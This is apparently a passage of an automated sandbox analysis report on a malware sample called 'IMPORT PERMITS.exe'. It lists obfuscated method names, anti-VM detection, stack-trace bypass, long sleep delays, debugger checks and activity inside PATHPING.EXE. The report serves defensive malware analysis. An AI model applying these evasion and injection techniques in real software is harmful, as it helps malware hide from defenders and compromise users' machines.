                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, LI0umUlFURor33drKF.csHigh entropy of concatenated method names: 'HL2OEmHUo', 'j3rNDoAX7', 'YxwQZH0Kq', 'EPArkZRAT', 'vKYC8Vnyr', 'N59WtxeLu', 'DEN5FwVIA6TI21MvVs', 'FQhPIluPRhr2BS109H', 'Vpx9dkPRD', 'iChwhNVVa'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, uJ2cQeL7dCfAKUv4kg.csHigh entropy of concatenated method names: 'zid8vSFQts', 'xpQ8d4KEki', 'BnK8TFAFYc', 'qVx8EPt9qu', 'uns8h1CWGU', 'XwU8V4PG9O', 'qle8DyQZdm', 'TSX8H677SQ', 'EW78oUJTX0', 'EN88KZU6jK'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, BoHPZxa7RvNPmEtVpD7.csHigh entropy of concatenated method names: 'Sp2MnBRhl6', 'UNKMgVL3mc', 'AgHMOHTrYl', 'r5GMNik3gM', 'BSEMkGVIgt', 'iplMQXYs6r', 'lO9Mrm1lta', 'q3fMLJLyaf', 'J8nMCh17oH', 'clAMWcsqPQ'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, rl13CTHWclDCopnopi.csHigh entropy of concatenated method names: 'fJ49YL4Lg4', 'G5c98QYpan', 'qgF9Umc11j', 'VGS9qkLSkA', 'aDT92bjkEd', 'lNg90pIjeT', 'odZ9yBEpZQ', 'R8r93FE5Gu', 'c239X7UwOR', 'Vpa9ZJWVwY'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, N4bxquUbn13KJuaQkX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UxGlooHnuS', 'FAelKQQjbD', 'jXslznt4Hv', 'kmfR7xHfo9', 'HatRav3Njl', 'L8gRlPtNKZ', 'zZ7RRToisB', 'Mb2MecD2AKmEIZ2DyA'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, ic7kMf5J3gC5EWCncN.csHigh entropy of concatenated method names: 'EyA2Jor71M', 'p6S28Uj5Uh', 'OKv2qWokxI', 'r6G20loIMw', 'iLl2yuqo8W', 'zkSqhcnc83', 'KGCqV3Vr7T', 'AyVqDlmbim', 'd8pqHOsS0e', 'EZwqofMCxG'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, dWUavZj6Tp68FDuP0Z.csHigh entropy of concatenated method names: 'Tuq0ntVily', 'DRe0gByrSI', 'SqB0OKBo1w', 'TVB0NVcbt8', 'ih80kU0DCj', 'dHm0QyHPwY', 'VF60rof79V', 'vBO0LKBHZ3', 'CwW0C8Ebhr', 'b1H0Whq6dN'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, weprK8KgFP2C2s7YhK.csHigh entropy of concatenated method names: 'wDaMacEejQ', 'B94MRlPv6F', 'UlWMtW5fvK', 'M7FMYlZPif', 'J6OM8pEAnC', 'BUyMqQ1EAU', 'OstM2vhY7f', 'go09DmxaIe', 'Opl9Hx53Wi', 'opN9oqJaYe'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, dSpHj0tkjS2ugiVHZX.csHigh entropy of concatenated method names: 'O44a0J2cQe', 'adCayfAKUv', 'UR9aXtaLdS', 'ImHaZPWHoP', 'kRTabl8qc7', 'BMfaeJ3gC5', 'eevwdYbWi6NKXbLXHg', 'fXY7gTsy8IAWpCEwIG', 'F44aaoZjut', 'svOaRrxlWM'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, bcXUthCR9taLdS1mHP.csHigh entropy of concatenated method names: 'zABUN4a6c8', 'AuDUQg6Nfd', 'C5oUL28bOm', 'OBYUC71kZX', 'FkUUbDDPEV', 'oqFUefcwwq', 'P2NUS49cCc', 'hhAU9WV75h', 'DlBUMc68Pw', 'viRUwf80KJ'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, cqhbasV4dMhUVe5Q0m.csHigh entropy of concatenated method names: 'YXrSHWk8kH', 'OswSKasPst', 'GXC97rlaaw', 'e4m9aarQdT', 'DilS612NGv', 'taSSunWYkG', 'JMESsx4hBS', 'V6rSviqY0L', 'UW0Sd594fL', 'i41STswsc5'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, r57vERvG1vGkubsFHp.csHigh entropy of concatenated method names: 'NrLbmvOxrD', 'idrbuM2La9', 'o2SbvicVQ7', 'tJ9bdekGW4', 'KGRbAm3gPu', 'eBxbGIqUqT', 'hIwb1pnUFs', 'I2Abc6iFqD', 'oFXbpS5kwK', 'TmrbBL8Ksk'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, xfTd7AovTNHXIiEgOE.csHigh entropy of concatenated method names: 'gkp95IY2o8', 'qba9AAIBLq', 'nOP9GkjAwF', 'wqk915IxVW', 'G7J9v1FIBB', 'nWo9cJupph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, lBo05wT8L3jNjs3gvY.csHigh entropy of concatenated method names: 'ToString', 'gJEe6856JL', 'ikceAa21rY', 'ioFeGPgELq', 'YT1e1Rbpxb', 'spuece4PAi', 'c0AepudyJT', 'NEheBm65rQ', 'mBsePoN9w6', 'ORiejmNjq0'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, s1rCFR8N03xdpUgBPW.csHigh entropy of concatenated method names: 'Dispose', 'EJgao0l62P', 'hcUlAmgGiM', 'I5syyQDYAG', 'q9laK13CTW', 'JlDazCopno', 'ProcessDialogKey', 'KiIl7fTd7A', 'RTNlaHXIiE', 'yOEllxeprK'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, aPVkC3sUY9THDneml7.csHigh entropy of concatenated method names: 'GdGFLi57HZ', 'fHUFC78mcK', 'vfdF5kKxyo', 'qGKFAp6Qye', 'T0iF1wcug9', 'PIrFc3WXFM', 'VsEFBdhd6w', 'sEFFPXiQiu', 'VegFmUtYQE', 'CE9F6YN5Xt'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, T2rwlHBY0HKnqPWuww.csHigh entropy of concatenated method names: 'SX40Y3welW', 'P5i0U8gSpX', 'vdw02938pl', 'EU32KfxF19', 'D6k2z4rPHY', 'f9M07HZciO', 'fmj0aUdOvG', 'PTZ0lcI3cX', 'pW80RoK3cM', 'v9v0t2Bxcw'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, B9cgSgaRKLldsKMyTfA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eaWwvs4B0m', 'N3AwdO7Boh', 'HplwTsrjq3', 'gfywEnPcR2', 'S7FwheQ2Cp', 'i8twVH6lwn', 'bEFwD7hv14'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.csHigh entropy of concatenated method names: 'buWRJ3unos', 'Iu4RY4bduh', 'Eu5R8Sk48L', 'NMwRUwC9qj', 'KhRRqoLFtt', 'iheR2cHvlq', 'pWMR0Sc4DA', 'UWlRyZ73bC', 'pkeR3PgvST', 'v3fRXa23wg'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, LI0umUlFURor33drKF.csHigh entropy of concatenated method names: 'HL2OEmHUo', 'j3rNDoAX7', 'YxwQZH0Kq', 'EPArkZRAT', 'vKYC8Vnyr', 'N59WtxeLu', 'DEN5FwVIA6TI21MvVs', 'FQhPIluPRhr2BS109H', 'Vpx9dkPRD', 'iChwhNVVa'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, uJ2cQeL7dCfAKUv4kg.csHigh entropy of concatenated method names: 'zid8vSFQts', 'xpQ8d4KEki', 'BnK8TFAFYc', 'qVx8EPt9qu', 'uns8h1CWGU', 'XwU8V4PG9O', 'qle8DyQZdm', 'TSX8H677SQ', 'EW78oUJTX0', 'EN88KZU6jK'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, BoHPZxa7RvNPmEtVpD7.csHigh entropy of concatenated method names: 'Sp2MnBRhl6', 'UNKMgVL3mc', 'AgHMOHTrYl', 'r5GMNik3gM', 'BSEMkGVIgt', 'iplMQXYs6r', 'lO9Mrm1lta', 'q3fMLJLyaf', 'J8nMCh17oH', 'clAMWcsqPQ'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, rl13CTHWclDCopnopi.csHigh entropy of concatenated method names: 'fJ49YL4Lg4', 'G5c98QYpan', 'qgF9Umc11j', 'VGS9qkLSkA', 'aDT92bjkEd', 'lNg90pIjeT', 'odZ9yBEpZQ', 'R8r93FE5Gu', 'c239X7UwOR', 'Vpa9ZJWVwY'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, N4bxquUbn13KJuaQkX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UxGlooHnuS', 'FAelKQQjbD', 'jXslznt4Hv', 'kmfR7xHfo9', 'HatRav3Njl', 'L8gRlPtNKZ', 'zZ7RRToisB', 'Mb2MecD2AKmEIZ2DyA'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, ic7kMf5J3gC5EWCncN.csHigh entropy of concatenated method names: 'EyA2Jor71M', 'p6S28Uj5Uh', 'OKv2qWokxI', 'r6G20loIMw', 'iLl2yuqo8W', 'zkSqhcnc83', 'KGCqV3Vr7T', 'AyVqDlmbim', 'd8pqHOsS0e', 'EZwqofMCxG'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, dWUavZj6Tp68FDuP0Z.csHigh entropy of concatenated method names: 'Tuq0ntVily', 'DRe0gByrSI', 'SqB0OKBo1w', 'TVB0NVcbt8', 'ih80kU0DCj', 'dHm0QyHPwY', 'VF60rof79V', 'vBO0LKBHZ3', 'CwW0C8Ebhr', 'b1H0Whq6dN'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, weprK8KgFP2C2s7YhK.csHigh entropy of concatenated method names: 'wDaMacEejQ', 'B94MRlPv6F', 'UlWMtW5fvK', 'M7FMYlZPif', 'J6OM8pEAnC', 'BUyMqQ1EAU', 'OstM2vhY7f', 'go09DmxaIe', 'Opl9Hx53Wi', 'opN9oqJaYe'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, dSpHj0tkjS2ugiVHZX.csHigh entropy of concatenated method names: 'O44a0J2cQe', 'adCayfAKUv', 'UR9aXtaLdS', 'ImHaZPWHoP', 'kRTabl8qc7', 'BMfaeJ3gC5', 'eevwdYbWi6NKXbLXHg', 'fXY7gTsy8IAWpCEwIG', 'F44aaoZjut', 'svOaRrxlWM'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, bcXUthCR9taLdS1mHP.csHigh entropy of concatenated method names: 'zABUN4a6c8', 'AuDUQg6Nfd', 'C5oUL28bOm', 'OBYUC71kZX', 'FkUUbDDPEV', 'oqFUefcwwq', 'P2NUS49cCc', 'hhAU9WV75h', 'DlBUMc68Pw', 'viRUwf80KJ'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, cqhbasV4dMhUVe5Q0m.csHigh entropy of concatenated method names: 'YXrSHWk8kH', 'OswSKasPst', 'GXC97rlaaw', 'e4m9aarQdT', 'DilS612NGv', 'taSSunWYkG', 'JMESsx4hBS', 'V6rSviqY0L', 'UW0Sd594fL', 'i41STswsc5'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, r57vERvG1vGkubsFHp.csHigh entropy of concatenated method names: 'NrLbmvOxrD', 'idrbuM2La9', 'o2SbvicVQ7', 'tJ9bdekGW4', 'KGRbAm3gPu', 'eBxbGIqUqT', 'hIwb1pnUFs', 'I2Abc6iFqD', 'oFXbpS5kwK', 'TmrbBL8Ksk'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, xfTd7AovTNHXIiEgOE.csHigh entropy of concatenated method names: 'gkp95IY2o8', 'qba9AAIBLq', 'nOP9GkjAwF', 'wqk915IxVW', 'G7J9v1FIBB', 'nWo9cJupph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, lBo05wT8L3jNjs3gvY.csHigh entropy of concatenated method names: 'ToString', 'gJEe6856JL', 'ikceAa21rY', 'ioFeGPgELq', 'YT1e1Rbpxb', 'spuece4PAi', 'c0AepudyJT', 'NEheBm65rQ', 'mBsePoN9w6', 'ORiejmNjq0'
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: IMPORT PERMITS.exe PID: 6572, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: 1010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: 29E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: 76D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: 86D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: 8880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: 9880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: A1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeMemory allocated: B1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0142096E rdtsc 2_2_0142096E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEWindow / User API: threadDelayed 3657Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEWindow / User API: threadDelayed 6316Jump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe TID: 6668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280Thread sleep count: 3657 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280Thread sleep time: -7314000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280Thread sleep count: 6316 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280Thread sleep time: -12632000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704Thread sleep time: -51000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PATHPING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0041C160 FindFirstFileW,FindNextFileW,FindClose,7_2_0041C160
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: firefox.exe, 00000009.00000002.2352367469.0000018E4151C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllttRdP
                Source: gKZXbGXeVZyo.exe, 00000008.00000002.4121401540.00000000014EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0142096E rdtsc 2_2_0142096E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00417513 LdrLoadDll,2_2_00417513
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01474144 mov eax, dword ptr fs:[00000030h]2_2_01474144
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01474144 mov eax, dword ptr fs:[00000030h]2_2_01474144
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01474144 mov ecx, dword ptr fs:[00000030h]2_2_01474144
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01474144 mov eax, dword ptr fs:[00000030h]2_2_01474144
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01474144 mov eax, dword ptr fs:[00000030h]2_2_01474144
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01478158 mov eax, dword ptr fs:[00000030h]2_2_01478158
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4164 mov eax, dword ptr fs:[00000030h]2_2_014B4164
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4164 mov eax, dword ptr fs:[00000030h]2_2_014B4164
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov eax, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov ecx, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov eax, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov eax, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov ecx, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov eax, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov eax, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov ecx, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov eax, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E10E mov ecx, dword ptr fs:[00000030h]2_2_0148E10E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148A118 mov ecx, dword ptr fs:[00000030h]2_2_0148A118
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148A118 mov eax, dword ptr fs:[00000030h]2_2_0148A118
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148A118 mov eax, dword ptr fs:[00000030h]2_2_0148A118
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148A118 mov eax, dword ptr fs:[00000030h]2_2_0148A118
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A0115 mov eax, dword ptr fs:[00000030h]2_2_014A0115
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01410124 mov eax, dword ptr fs:[00000030h]2_2_01410124
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6154 mov eax, dword ptr fs:[00000030h]2_2_013E6154
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6154 mov eax, dword ptr fs:[00000030h]2_2_013E6154
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DC156 mov eax, dword ptr fs:[00000030h]2_2_013DC156
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A61C3 mov eax, dword ptr fs:[00000030h]2_2_014A61C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014A61C3 mov eax, dword ptr fs:[00000030h]2_2_014A61C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E1D0 mov eax, dword ptr fs:[00000030h]2_2_0145E1D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E1D0 mov eax, dword ptr fs:[00000030h]2_2_0145E1D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0145E1D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E1D0 mov eax, dword ptr fs:[00000030h]2_2_0145E1D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145E1D0 mov eax, dword ptr fs:[00000030h]2_2_0145E1D0
